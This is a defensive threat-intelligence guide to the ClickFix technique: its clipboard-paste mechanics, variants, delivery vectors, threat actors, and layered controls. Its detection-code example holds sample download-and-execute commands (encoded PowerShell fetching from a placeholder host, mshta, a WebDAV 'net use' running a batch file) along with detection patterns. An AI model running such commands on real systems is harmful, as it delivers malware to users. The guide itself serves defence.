
ClickFix in 2026: Trust-Flow Patterns, Named Variants, and What Stops Them

ClickFix sits inside a wider category of trust-flow attacks: workflows that feel routine but end with the user completing the attacker's action.

Updated April 2026 - The trust-flow patterns behind ClickFix, the variants and vectors carrying it, and the defences that work in 2026.


ClickFix is a social engineering attack that tricks users into running malicious commands on their own computers. It hides behind prompts that feel routine: a CAPTCHA verification, a browser error, a "click here to fix" button. The user thinks they are following a safety step, when they are in fact running the attack.

ClickFix is the most prominent example of what we call a trust-flow attack: an attack that disguises the malicious action inside a workflow the user trusts and expects to be safe. The category is wider than the technique. Fake tech support workflows, OAuth and SSO consent phishing, and mobile QR-code device-linking schemes all share the pattern, and we use trust-flow as shorthand for what they have in common.

The technique has crossed from emerging threat to mainstream initial access vector. Microsoft's 2025 Digital Defense Report places it at 47% of all observed initial compromises, ahead of traditional phishing at 35%. ESET measured 517% growth in H1 2025.

The Center for Internet Security tracked ClickFix as over a third of all non-malware Albert alerts against US public sector targets in H1 2025. Albert is CIS's network monitoring system deployed across US state and local government agencies. Recorded Future's Insikt Group, writing in March 2026, assesses ClickFix will very likely remain the dominant initial access vector throughout 2026.

Four independent measurement perspectives agree on the same trajectory. The technique now distributes through at least nine vectors, has spawned at least seven named variants, and is operated by everyone from criminal kit purchasers to nation-state groups including Kimsuky, MuddyWater, and APT28.

What Stops ClickFix

Short version, ahead of the full guide below: ClickFix is a technique problem, not a campaign problem. Detection rules tied to specific variants (RunMRU activity, Windows Terminal spawning PowerShell, WebDAV mappings) are necessary but not sufficient because new variants emerge monthly. The defences that hold across variants are three layers working together.

Layer one: block the execution path. Restrict PowerShell and script execution for non-administrative users through Group Policy or WDAC. This is the highest-impact single control. If the standard user cannot execute PowerShell, the most common ClickFix payload fails regardless of variant.

Layer two: train for trust-flow patterns. Generic phishing awareness does not address ClickFix because the attack reaches users through interactions they expect to be safe. Training has to teach pattern recognition (a verification step asking for a system action, an unprovoked browser warning offering a fix, a routine workflow with an unexpected step) rather than specific lures.

Layer three: detect the execution sequences. SIEM rules built around RunMRU activity, Windows Terminal spawning PowerShell, and clipboard-to-terminal patterns catch the execution itself rather than the lure that delivered it.

The full guide below expands each layer with implementation detail, the variants currently active, the vectors carrying them, and the trust-flow patterns the training needs to address.

How a ClickFix Attack Works

The core mechanic is simple and, in hindsight, obvious: attackers convince users to copy and execute malicious commands through legitimate system tools.

Step 1: The fake prompt. You land on a webpage showing what looks like a CAPTCHA verification, a browser error, or a document rendering problem. Attackers clone real interfaces: Cloudflare Turnstile, Google reCAPTCHA, Microsoft authentication, and Okta login pages have all been replicated in ClickFix campaigns (Proofpoint, 2024; Unit 42, 2025).

Step 2: The clipboard hijack. When you interact with the fake prompt, malicious code is silently copied to your clipboard. The page's JavaScript has already staged the payload. Unit 42 describes this as "pastejacking" because the user is unknowingly pasting attacker-controlled commands (Palo Alto Networks, 2025).

Step 3: The execution. The prompt tells you to press Windows+R to open the Run dialogue, then Ctrl+V to paste, then Enter. That single sequence executes a PowerShell script, an mshta command (mshta.exe is a Windows utility for running HTML applications, frequently abused to execute scripts), or a cmd instruction that downloads malware directly into memory. The entire attack takes seconds.

macOS and Linux users face the same technique. On macOS, users have historically been directed to paste commands into Terminal. The April 2026 Script Editor variant documented by Jamf Threat Labs uses the applescript:// URL scheme instead, auto-opening Script Editor with a pre-loaded script that the user runs by clicking a button. ESET confirmed ClickFix affects all major operating systems (ESET, 2025).

The name "ClickFix" was coined by Proofpoint researchers in 2024, reflecting how attackers almost always include buttons labelled "Fix", "How to fix", or "Fix it." From 2010 to 2015, Microsoft's own "Fix it" solutions trained users to click automated repair prompts. Attackers exploit that conditioned behaviour.

How ClickFix Maps to MITRE ATT&CK

ClickFix sits across multiple ATT&CK techniques rather than under a single ID. MITRE added T1204.004 (Malicious Copy and Paste) specifically to capture the ClickFix copy-paste pattern and named the technique in the description. The execution chain extends well beyond that single sub-technique.

No single ClickFix campaign uses every technique below. Different variants and campaigns combine different techniques from this set. The table maps the full possibility space so defenders can match observed campaigns against the techniques most relevant to their environment.

| Attack chain stage | MITRE technique | Notes |
|---|---|---|
| Email-delivered initial access | T1566.002 Spearphishing Link | When the campaign reaches the user via email with a link to the landing page |
| Web-delivered initial access | T1189 Drive-by Compromise | Compromised legitimate sites, malvertising, search-engine result poisoning |
| User-induced execution (paste) | T1204.004 Malicious Copy and Paste | The standard ClickFix flow: clipboard-staged command pasted into Run, Terminal, Win+X |
| User-induced execution (URL) | T1204.001 Malicious Link | Covers the macOS Script Editor variant where applescript:// pre-loads a script |
| Command interpreter | T1059.001 PowerShell | Primary execution mechanism on Windows |
| Command interpreter | T1059.002 AppleScript | Primary execution mechanism on macOS |
| Clipboard staging | T1115 Clipboard Data | The clipboard-hijack mechanism that delivers the payload silently |
| LOLBin proxy execution | T1218.005 Mshta | When mshta.exe is the executor of the malicious payload |
| LOLBin proxy execution | T1218 (other sub-techniques) | finger.exe, SyncAppvPublishingServer.vbs, and other living-off-the-land binaries |
| Application layer protocol | T1071.004 DNS | The nslookup variant disclosed by Microsoft in February 2026 |

A defender writing detection coverage for "ClickFix" needs to think across this table, not under one technique ID. Most existing ClickFix coverage references one or two of these techniques in passing. The full mapping matters because gaps in coverage on any row leave a working delivery path for attackers, even if no single attacker uses all rows in one campaign.

The Nine Distribution Vectors

ClickFix campaigns reach users through more than one channel. Treating it as an email problem misses most of the attack surface.

Vectors describe how the attack reaches the user. Variants describe how the attack executes once the user engages. The same campaign can combine any vector with any variant, and most use only one or two vectors at a time. The full list matters for defenders because the next campaign may use a completely different vector to the last one.

1. Email phishing

The original delivery method, still significant. The user receives an email with a link that leads to a ClickFix landing page, often after redirection through a traffic distribution system. Proofpoint's TA571 research documented the technique's emergence through this vector in 2024.

2. Compromised legitimate websites

Attackers inject JavaScript into legitimate sites they have breached. The injected code displays a fake CAPTCHA or verification prompt to visitors. Elastic Security documented this pattern in February 2026 on bincheck.io, a legitimate Bank Identification Number validation service that delivered the MIMICRAT payload through an injected Cloudflare verification page.

3. Malvertising

Malicious advertisements on streaming sites, pirated content sites, and other high-traffic destinations redirect users to ClickFix landing pages. Microsoft observed campaigns in April 2025 where free movie streaming pages funnelled tens to hundreds of thousands of users per day to ClickFix landing pages delivering Lumma Stealer.

4. Compromised browser extensions

Legitimate browser extensions taken over through ownership transfer or developer compromise. The new owner pushes an update that injects ClickFix prompts into the user's browsing experience. Bleeping Computer documented the QuickLens extension in February 2026, where version 5.8 disabled key browser security protections and weaponised the extension for both clipboard-based attacks and crypto wallet theft.

5. Search engine result poisoning

Attackers create or compromise pages that rank for "fix [error]" or "how to [problem]" search queries. Users searching for solutions to real technical problems land on ClickFix pages. Recorded Future's Insikt Group identified this pattern across multiple cluster operations in their March 2026 analysis.

6. Marketplace and brand impersonation

Campaigns clone the look and feel of trusted brands to deliver ClickFix through what appears to be a legitimate workflow. Palo Alto Unit 42 documented Storm-1865 impersonating Booking.com to target hospitality organisations. Recorded Future identified clusters impersonating QuickBooks (US tax season targeting), Birdeye, and Zillow real estate listings.

7. Social media DMs and verification scams

Attackers contact content creators and business page owners with offers of verification badges or warnings about account violations. Hunt.io and Cybersecurity News documented active campaigns through Facebook in January 2026 where users were instructed to copy authentication tokens during a fake verification process.

8. Job platforms and recruitment lures

Nation-state campaigns targeting job applicants in specific industries. Sekoia documented North Korean Lazarus Group activity expanding their "ClickFake Interview" campaign in February 2025, providing fake skill assessments to cryptocurrency company applicants that incorporated ClickFix.

9. Compromised software update prompts

Pages presenting fake software update notifications, often impersonating browser updates or codec installers. Microsoft documented campaigns involving SocGholish JavaScript payloads delivering fake browser update notifications that triggered ClickFix flows.

The defensive implication: an organisation that has solved email-borne ClickFix has solved one vector. Web filtering addresses two and three. Browser extension policy addresses four. Brand monitoring partially addresses six. Different campaigns weight these vectors differently, but no single control covers the full vector list. Defending against ClickFix requires layered controls because the attacker's delivery surface is wider than the defender's typical email-centric phishing programme.

The ClickFix Family: Named Variants

The previous section covered vectors (how the attack reaches the user). This section covers variants (how the attack executes once the user engages). A campaign's vector and variant choices are independent. Defenders need detection coverage for both axes.

The variants below have public technical reporting documenting their behaviour in the wild. Each shares the same social engineering pattern but differs in execution mechanism, target platform, or detection-evasion approach.

ClickFix (the original)

The base technique. Fake CAPTCHA or browser error prompt. Clipboard staging. User pastes into the Win+R Run dialogue (the small command box that opens when you press the Windows key and R together), presses Enter, the PowerShell payload executes. First named by Proofpoint researchers in 2024. Still the most prevalent variant.

CrashFix

Huntress identified CrashFix in January 2026. A malicious Chrome extension (typically introduced through the browser extension vector, including the documented NexShield extension impersonating uBlock Origin Lite) floods the browser with chrome.runtime port connections (a Chrome extension messaging mechanism) until the browser becomes unresponsive. After force-close and restart, a fake security warning recommends a "scan" that leads to the standard ClickFix execution flow. The genuine browser crash makes the social engineering more convincing than a fake one. Delivers ModeloRAT and specifically targets corporate domain-joined machines.

DNS Staging Variant (nslookup-based)

Microsoft Threat Intelligence disclosed this variant in February 2026. It replaces the typical PowerShell download with a nslookup command that retrieves the next-stage payload through DNS responses. The choice of DNS as a covert delivery channel works because most organisations do not inspect DNS response payloads. The attack chain delivers ModeloRAT through a ZIP archive containing a portable Python interpreter, establishing persistence through Windows Startup folder shortcuts.

Windows Terminal Variant

The most operationally significant variant of 2026 to date. Microsoft Threat Intelligence disclosed it on 6 March 2026. It replaces Win+R with Win+X then I, which launches Windows Terminal (wt.exe) directly rather than the Run dialogue. This defeats detection rules built specifically around RunMRU activity (the Windows registry key that records every command typed into the Run dialogue). The payload uses commands encoded in hex and compressed with XOR, chained through multiple PowerShell processes to unpack and run. Delivers Lumma Stealer, which then hooks into Chrome and Edge browser processes through the QueueUserAPC() API to extract saved login credentials. A second infection path uses EtherHiding, a technique that hides command-and-control communications inside blockchain smart contract data.

Script Editor Variant (macOS)

Jamf Threat Labs documented this in April 2026, with secondary coverage in Malwarebytes and BleepingComputer. The variant sidesteps Terminal entirely by using the applescript:// URL scheme (a special URL format that, when clicked, opens Apple's Script Editor application with the link's content pre-loaded) to auto-open Script Editor with a pre-populated malicious script. The user clicks "Run" rather than copy-pasting. Lure: "Reclaim Disk Space on your Mac." Delivers Atomic Stealer. The variant emerged after Apple introduced Terminal paste protection in macOS Tahoe 26.4, demonstrating how attackers route around new defensive controls.

WebDAV Variant (net use)

Atos researchers identified this variant in March 2026. It replaces PowerShell download with a "net use" command that maps a WebDAV share (a file-sharing protocol built into Windows that lets a remote folder appear as a local drive) from an attacker-controlled server, then executes a hosted .cmd batch file through standard filesystem semantics. Bypasses EDR detection rules focused on PowerShell, mshta, and wscript by using native networking utilities. Successfully evaded Microsoft Defender for Endpoint in the documented case.

ClickFake Interview

A North Korean (Lazarus Group) campaign variant documented by Sekoia in February 2025. Uses fake job interview websites to deploy a Go-based backdoor called GolangGhost on both Windows and macOS, targeting non-technical employees in centralised finance and cryptocurrency companies (business development, marketing managers, asset managers). Sekoia assesses this is a continuation of Lazarus's earlier Contagious Interview campaign, with the ClickFix-style "fake camera driver fix" lure replacing earlier infection methods. Designed for credential and information theft to fund DPRK geopolitical objectives.

Other named variants and ongoing evolution

Public reporting also references FileFix, JackFix, ConsentFix, GlitchFix, TerminalFix, and DownloadFix. Technical depth on each varies across sources, with some appearing as one-line references in aggregator coverage and others with partial behavioural detail. The naming ecosystem is fluid: new variant names appear regularly, sometimes referring to genuinely distinct techniques and sometimes to minor operational variations on existing variants. Defenders should expect the variant list to keep growing.

What the variant family tells us

In our view, the strongest driver of variant emergence is evasion. Each new variant exists because attackers are routing around specific defensive controls that have started working. CrashFix exists because users became wary of unprovoked browser warnings (unexpected browser warnings that appear without the user doing anything obvious to trigger them).

The Windows Terminal variant exists because RunMRU detection improved. The Script Editor variant exists because Mac users learned not to paste into Terminal. The WebDAV variant exists because PowerShell detection improved.

The variants worth watching most closely are those that meaningfully expand the attack surface. Script Editor opens up macOS UI patterns beyond Terminal. WebDAV opens up native Windows networking utilities.

Why ClickFix Bypasses EDR and Email Security

Two decades of working with security teams deploying endpoint protection point to one conclusion: ClickFix is effective not because defences are weak. The defences are working as designed. ClickFix bypasses them because of where the attack happens.

Two factors combine. First, the attack turns the user into the delivery mechanism. From an EDR perspective (endpoint detection and response, the security software running on company laptops and servers), ClickFix looks like a user launching powershell.exe from explorer.exe. No malicious file written to disk, no suspicious parent-child process chain, no exploit triggering a detection rule. The payload executes in memory through LOLBins (living-off-the-land binaries, legitimate Windows tools such as PowerShell, mshta, and finger that attackers reuse for malicious purposes), all of them already trusted by the operating system (Microsoft, 2025).

Second, the attack frames itself as a workflow the user trusts. This is the trust-flow pattern in action. The user is not asked to do something they recognise as risky. They are asked to verify themselves, fix an error, or complete a security check. The cognitive defences they have built around phishing emails (do not click links from strangers, do not open unexpected attachments) do not apply because this does not look like phishing. It looks like a security workflow they are familiar with.

Email security cannot resolve either factor. Email security scans attachments and URLs. ClickFix campaigns often contain only a clean URL that redirects through traffic distribution systems before landing on the attack page. Browser protections like Google Safe Browsing do not trigger because the browser is not downloading an executable. The user is.

Bitdefender noted that most malicious domains have already done their damage and been abandoned before any blocklist catches up (Bitdefender, 2025). Attackers spin up new domains faster than reputation services can flag them. Even if the domain reputation system worked perfectly, it would be addressing the wrong half of the problem because the technical execution is not the part the user fails at. The cognitive recognition is.

Where ClickFix Likely Goes From Here

ClickFix appears to have hit an attacker sweet spot: high success rate, low operational cost, broad target compatibility, and a defensive surface fragmented across email, web, training, endpoint, and identity controls. Public adoption metrics suggest this is sustained, not transient.

Microsoft has the technique at 47% of initial access, ESET measured 517% H1 2025 growth, and Recorded Future forecasts dominance through 2026. Roughly one new named variant has appeared in public reporting per month through 2026 H1.

The predictions below are grounded in observed patterns rather than speculation. Where confidence is high, we say so. Where the prediction is plausible but not yet observed, we say that too.

1. Variant velocity sustains or accelerates. Commercial kits ($200-$1,500 monthly per public reporting) reduce the cost of producing new variants. Each defensive improvement narrows one path, leaving the others intact. We expect a new named variant in public reporting roughly every 30-60 days through 2026, with the rate accelerating as more researchers focus on the technique.

Three identical workflows. The same trust-flow pattern. The compromise hides where the floor gives way.

2. Mobile is a wider question than it first appears, and partially answered already. The literal mobile-native ClickFix prediction, where users paste commands into a mobile shell, overstates the case. Mobile platforms lack the readily available command-line interfaces that desktop ClickFix exploits. Current ClickFix phishing kits actively block mobile users because the standard payloads do not execute. Palo Alto Unit 42's IUAM ClickFix Generator (active July-October 2025) explicitly filtered out mobile traffic.

The more useful observation is that the underlying social engineering pattern is already established on mobile, just not labelled as ClickFix. ESET's January 2026 GhostChat report documents the clearest bridge: the same threat actor running desktop ClickFix campaigns also operated a mobile QR-code WhatsApp device-linking operation, sharing infrastructure and lure framing across both sides.

The wider point: ClickFix has given attackers a model for shaping social engineering attacks. Traditional social engineering required convincing the user to take an unusual or risky action. ClickFix inverts that. The user is asked to do something that feels routine, helpful, or protective. Once attackers have a working pattern that frames the malicious action as a normal verification step, every flow with a similar shape becomes a potential variant.

An "IT support" Teams message walking you through a remote-access install after your inbox suddenly fills with subscription confirmations. An OAuth consent screen requesting permissions for what looks like a routine corporate app. Neither is technically ClickFix, but both share the structural ingredients: a context that feels safe, a request that feels routine, and a workflow that ends with the user having handed over what the attacker wanted.

We expect the framing of ClickFix to broaden through 2026 toward this wider trust-flow category. Mobile-specific named variants are possible but uncertain. The category expansion is more likely than the technical replication. Defenders should orient around the trust-flow pattern rather than wait for individual mobile-named variants.

3. AI-generated lures raise the social engineering quality bar. Current ClickFix lures rely on generic CAPTCHA, browser, and verification prompts. AI generation makes locally-relevant, well-localised, brand-accurate, and personalised lures dramatically cheaper to produce at scale. Expect cluster-specific campaigns (US tax season, hospitality, crypto) to shift from templated lures to AI-tuned ones through 2026.

4. Enterprise authentication flows become a primary target. OAuth consent screens, SSO challenges, MFA approval prompts, and SaaS verification flows all share the trust-flow pattern. Users have been trained to engage with these as security-positive interactions, which makes a ClickFix variant weaponising enterprise auth flow expectations particularly difficult to defend against. This is the prediction most worth tracking carefully because the cognitive defences users have built around enterprise auth flows are aligned with attacker goals.

5. Vertical-specific clusters proliferate. Recorded Future already identified clusters for US tax season (QuickBooks impersonation), hospitality (Booking.com), and crypto (ClickFake Interview). Expect documented clusters for healthcare, education, financial services, and real estate within the next two quarters. Each cluster will tend to use lures and brands native to that sector's normal workflow.

6. Detection regression as variants split. Defenders building per-variant detections face increasing maintenance burden. Organisations with strong PowerShell detection but no WebDAV detection will get hit by WebDAV variants. Organisations with strong RunMRU detection but no Windows Terminal coverage will get hit by Terminal variants. The detection arms race favours attackers in the short to medium term because evasion costs less than detection.

What this means for defenders

The implication for defenders is direct. ClickFix has become structural rather than incidental. Investment needs to shift from chasing individual variant signatures toward controls that work across the technique pattern.

This is where the trust-flow framing becomes operationally useful. Treating ClickFix as a single technique encourages defenders to write detections and training for ClickFix specifically. Treating ClickFix as one example of a wider trust-flow category encourages defenders to write detections and training for the underlying pattern: workflows where the user is induced to perform what they perceive as a security or verification step. That framing covers the existing ClickFix variants, the variants that have not yet been named, and the OAuth, SSO, and verification-flow attacks that are not technically ClickFix but exploit the same cognitive vulnerability.

Practically, this means following ClickFix research closely enough to spot new variants when they first appear, mapping observed campaigns against existing detection coverage to find gaps, and prioritising controls that work regardless of the specific execution mechanism. Those controls are script execution restriction for non-administrative users, behaviour-based detection of execution-interface sequences, DNS query inspection, and trust-flow-aware user training rather than generic phishing awareness.

The teams falling behind are those treating each variant as a new individual incident. The ones doing well are the ones who have already realised this is a single growing problem with multiple faces, and who are building the muscle to spot the next face faster than the attackers can name it.

Which Threat Actors Use ClickFix

ClickFix emerged in early 2024 from cybercriminal operations, first documented by Proofpoint in campaigns by the initial access broker TA571 and the ClearFake malware cluster (Proofpoint, 2024). Adoption was rapid.

Cybercriminal campaigns

Cybercriminal operators now deliver a wide range of payloads. Lumma Stealer is the most common final payload based on Microsoft's observations, responsible for 51% of infections. Other regularly delivered malware includes DarkGate, AsyncRAT, Xworm, NetSupport RAT, Latrodectus loader, ModeloRAT, and the Amatera and Rhadamanthys infostealers (Microsoft, 2025). ClickFix builders are now sold commercially, providing weaponised landing pages ready to deploy (ESET, 2025). Underground markets sell ClickFix kits for $200 to $1,500 monthly, with customisable lures, VM detection bypass, and UAC evasion included (GBHackers).

Recorded Future Insikt Group cluster analysis (March 2026)

Insikt documented five distinct activity clusters with different operational patterns. Each cluster maintains its own lure themes, infrastructure, and target industries. The clusters are not attributed to specific named threat actors but represent coherent operational entities.

  • QuickBooks cluster. Targets US tax season, active January 2026 onwards. Recently pivoted toward Zillow real estate marketplace users.
  • Booking.com cluster (Storm-1865). Targets hospitality organisations across North America, Europe, and Asia.
  • Birdeye cluster. Impersonates the Birdeye reputation management platform.
  • Two additional clusters with distinct lure themes and infrastructure patterns.

Nation-state adoption

State-sponsored adoption began in late 2024. Proofpoint documented campaigns from four state-sponsored groups within a three-month window:

  • Kimsuky (North Korea) targeted think tanks researching North Korean policy, impersonating a Japanese diplomat to build trust before delivering QuasarRAT
  • MuddyWater (Iran) impersonated Microsoft security updates, timing phishing emails to coincide with Patch Tuesday
  • APT28 (Russia) used fake Google Spreadsheet prompts with reCAPTCHA-style verification
  • UNK_RemoteRogue (Russia) targeted defence contractors through compromised Zimbra servers

(Proofpoint, 2025)

When nation-state actors adopt a criminal technique this quickly, they are telling you it works against hardened targets. That is the part that should concern security teams more than the volume numbers.

Enterprise targeting

Enterprise targeting is accelerating. Unit 42 reported assisting in nearly a dozen incident response cases where ClickFix was the initial access vector, impacting organisations across technology, financial services, professional services, and manufacturing (Palo Alto Networks, 2025).

How to Defend Against ClickFix Attacks

No single control stops ClickFix. The defence works in layers, with technical controls reducing the attack surface and trust-flow awareness training addressing the parts technical controls cannot reach.

Three control layers matter: blocking the execution path on endpoints, training people to recognise trust-flow patterns, and detecting the execution patterns when they reach a SIEM. Each layer is described below. None of them is sufficient on its own.

How to Block ClickFix with Group Policy and WDAC

Restrict PowerShell and script execution for standard users through Group Policy or WDAC (Windows Defender Application Control, a Windows feature that restricts which applications and scripts can run on a system based on explicit allow rules). This is the highest-impact single control. If non-administrative users cannot execute PowerShell, the most common ClickFix payload fails. Class this as high priority: it helps across a wide range of payload scenarios, including new variants.

Block or monitor LOLBin abuse. Configure AppLocker or WDAC rules for mshta.exe, wscript.exe, cscript.exe, and finger.exe. Microsoft specifically recommended restricting outbound access for the finger utility (TCP port 79) after observing it abused in CrashFix campaigns (Microsoft Security Blog, 2026).

Enable PowerShell Script Block Logging. Non-negotiable. Without it, you have no forensic visibility into what ClickFix payloads executed. Enable Module Logging, Script Block Logging, and Transcription logging through Group Policy.

Monitor clipboard-to-terminal patterns. Alert on sequences of Win+R followed by PowerShell or cmd execution within short timeframes. This is anomalous for most business users.

Deploy DNS monitoring. The nslookup variant uses DNS as a staging channel. Monitor for nslookup commands executed from user-initiated processes targeting external DNS servers.

Review browser extension policies. After the NexShield and QuickLens incidents, restrict extension installation to approved lists where feasible. Monitor for extensions requesting unusual permissions like declarativeNetRequestWithHostAccess.

Block WebDAV egress where not required. The WebDAV variant relies on outbound connections to attacker-controlled SMB or WebDAV servers. Most enterprise networks do not require outbound SMB or WebDAV to arbitrary destinations and can block it at the firewall.

Trust-Flow Awareness Training for Employees

Technical controls reduce the attack surface. Training addresses the root cause.

Generic phishing awareness training is not sufficient for trust-flow attacks. Phishing training teaches people to be wary of unexpected emails from unknown senders. Trust-flow attacks specifically reach the user through interactions they expect to be safe: a CAPTCHA, a browser warning, a verification prompt, a routine workflow. The phishing-awareness instinct does not fire because the attack does not look like phishing.

What works is training that builds the habit of pausing when a familiar workflow takes an unusual turn. The cognitive prompt is "this feels routine, but does this part fit?"

Specific signals to teach:

  • A CAPTCHA or verification step that asks you to perform a system action (open a Run box, paste a command, click a button in Script Editor) is not a CAPTCHA. CAPTCHAs verify you are human within the browser. They never extend outside it.
  • A browser error that requires you to take action in another application is not a browser error. Real browser errors stay inside the browser.
  • A "fix" or "scan" offered immediately after an unexpected event (a crash, a slowdown, a notification) is suspicious. Real fixes do not appear precisely when something else just went wrong.
  • A verification flow that feels routine but asks for an action you have never been asked to perform before is worth pausing on. Routine workflows you genuinely trust have been seen many times. New steps in old workflows are red flags.
  • Any request to copy and paste text into a system tool (Run dialogue, Terminal, Script Editor, command prompt) is high risk regardless of how the request is framed.

The broader principle is to train people to question the flow, not just the surface. Scammers can fake the surface convincingly. The flow is harder to fake because legitimate workflows have established shapes that users see repeatedly.

Microsoft recommends building specific playbooks for ClickFix rather than relying on generic phishing awareness (Microsoft MDDR, 2025). The attack is different enough from email phishing that existing training may not cover it.

How to Detect ClickFix in Your SIEM

For organisations running SIEM platforms, these detection opportunities have proven effective:

  • Alert on PowerShell execution initiated from the Windows Run dialogue (explorer.exe > powershell.exe with specific command-line patterns)
  • Monitor for encoded PowerShell commands (Base64 strings in command-line arguments)
  • Flag HTTP requests with PowerShell user agents to external infrastructure
  • Detect mshta.exe or finger.exe spawned from browser processes
  • Monitor for SyncAppvPublishingServer.vbs execution, abused in recent campaigns to proxy PowerShell through a signed Microsoft component (Blackpoint, 2026)
  • Alert on Windows Terminal (wt.exe) spawning PowerShell with encoded or hex-encoded command-line arguments, particularly when preceded by user-initiated Win+X keyboard shortcuts
  • Monitor for "net use" commands mapping WebDAV or SMB shares from non-standard user contexts
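To make the process-creation bullets above concrete, here is detection logic run over constructed sample events. This is an added example, not the article's or any vendor's published Sigma rule; the event field names (parent_image, image, command_line), the lure.invalid host and the 203.0.113.10 address are assumptions, and the user-agent bullet is not covered because it needs proxy logs rather than process telemetry.

```python
import base64
import re

# Field names mimic Sysmon Event ID 1 (process creation); the record shape is an assumption.
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
LOLBINS = {"mshta.exe", "finger.exe", "wscript.exe", "cscript.exe"}
TERMINAL = {"wt.exe", "windowsterminal.exe"}  # wt.exe alias and the Terminal host process

# -EncodedCommand and the short forms PowerShell accepts (-e, -ec, -en, -enc); payload is base64
ENC_FLAG = re.compile(r"(?i)-e(?:ncodedcommand|nc|n|c)?\b\s+([A-Za-z0-9+/=]{20,})")
HEX_RUN = re.compile(r"(?:[0-9A-Fa-f]{2}){24,}")  # 48+ hex chars: hex-encoded command text
NET_USE = re.compile(r"(?i)\bnet(?:1)?(?:\.exe)?\s+use\s+\S+\s+(\\\\\S+|https?://\S+)")

def decode_encoded_command(command_line):
    """Return the UTF-16LE text behind -EncodedCommand, or None if absent or undecodable."""
    m = ENC_FLAG.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def classify(event):
    """Names of the detection patterns that fire for one process-creation event."""
    parent = event["parent_image"].rsplit("\\", 1)[-1].lower()
    image = event["image"].rsplit("\\", 1)[-1].lower()
    cmd = event["command_line"]
    hits = []
    if parent == "explorer.exe" and image in SHELLS:  # Run dialogue launches via explorer.exe
        hits.append("shell_from_run_dialog")
    if image in SHELLS and ENC_FLAG.search(cmd):
        hits.append("encoded_powershell")
    if parent in BROWSERS and image in LOLBINS:  # mshta.exe / finger.exe under a browser
        hits.append("lolbin_from_browser")
    if "syncappvpublishingserver.vbs" in cmd.lower():
        hits.append("syncappv_powershell_proxy")
    if parent in TERMINAL and image in SHELLS and (ENC_FLAG.search(cmd) or HEX_RUN.search(cmd)):
        hits.append("wt_encoded_shell")
    if NET_USE.search(cmd):  # WebDAV/SMB share mapped from a user-launched shell
        hits.append("net_use_remote_share")
    return hits

STAGE = "Invoke-RestMethod http://lure.invalid/stage"  # placeholder download cradle

# Constructed sample events, not real telemetry; lure.invalid and 203.0.113.10 are placeholders.
SAMPLE_EVENTS = [
    {"parent_image": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\notepad.exe",
     "command_line": r"notepad.exe C:\Users\alice\notes.txt"},
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell -w hidden -enc " + base64.b64encode(STAGE.encode("utf-16-le")).decode()},
    {"parent_image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "image": r"C:\Windows\System32\mshta.exe", "command_line": "mshta http://lure.invalid/verify"},
    {"parent_image": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\cscript.exe",
     "command_line": r'cscript C:\Windows\System32\SyncAppvPublishingServer.vbs "n; ' + STAGE + '"'},
    {"parent_image": r"C:\Users\alice\AppData\Local\Microsoft\WindowsApps\wt.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell -nop -c " + STAGE.encode().hex()},
    {"parent_image": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"cmd /c net use Z: \\203.0.113.10@8080\share & Z:\run.bat"},
]
```

The explorer.exe parent also appears for Start-menu launches, so the shell_from_run_dialog pattern needs the command-line conditions (encoded arguments, download cradles) before it becomes an alert rather than a hunting query.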

Florian Roth (Nextron Systems) and other detection engineers have published Sigma rules targeting ClickFix behaviour patterns. For ELK-based detection implementation, see our ELK Stack Security Monitoring Tutorial.

For broader threat actor context including groups documented running ClickFix campaigns, see our Threat Actor Tools Guide and the Scattered Spider attack chain analysis covering related social engineering tradecraft.

Building your security skills? Our Cybersecurity Skills Roadmap covers detection engineering fundamentals and career pathways. For the wider question of how AI is reshaping the SOC analyst role in light of techniques like ClickFix, see Will AI Replace SOC Analysts?.

Summary

ClickFix shifted attackers from breaking systems to convincing people. The user becomes the delivery mechanism. The attack succeeds because the cognitive defences users build against phishing do not apply to workflows they trust.

The trust-flow framing makes this technique easier to defend against, because it locates the problem correctly. ClickFix is one example of attackers disguising malicious actions inside trusted workflows. The defensive answer is not chasing each variant; it is building detection and training for the pattern itself.

Three controls matter most, and they work in layers. Restrict script execution for standard users. Train people to question the flow when a familiar workflow takes an unusual turn, not just to recognise specific tools or commands. Build detection rules for the execution patterns. If you have not done all three, you are exposed to the most common initial access technique currently observed.

For broader context, see our AI Security Threats guide and our breakdown of what infostealers are and how they work.


ClickFix Glossary: Key Terms

For readers new to the technical terminology in this guide, the following definitions cover the terms most used throughout the article.

Albert. The Center for Internet Security's network-based intrusion detection system, deployed across US state and local government agencies. CIS publishes ClickFix-related Albert alert statistics that provide a public-sector-specific view of the technique's prevalence.

Clipboard hijack. The mechanism by which a webpage's JavaScript silently copies an attacker-controlled command to the user's clipboard, ready to be pasted into a system interface.

EDR (Endpoint Detection and Response). Security software that runs on laptops and servers to monitor activity and detect malicious behaviour. Most ClickFix variants are designed to bypass EDR by routing execution through legitimate user actions.

LOLBin (Living Off The Land Binary). A legitimate Windows tool that attackers reuse for malicious purposes. Examples include PowerShell, mshta.exe, finger.exe, and SyncAppvPublishingServer.vbs.

mshta.exe. A Windows utility for running HTML applications. Frequently abused as a script execution mechanism because it is signed by Microsoft and present by default on Windows systems.

RunMRU. A Windows registry key (HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU) that records every command typed into the Run dialogue. Often the first place defenders look for evidence of ClickFix execution.

Script Block Logging (PowerShell). A Windows logging feature that records the content of every PowerShell script executed on a machine. Essential for ClickFix forensics. Disabled by default and enabled through Group Policy.

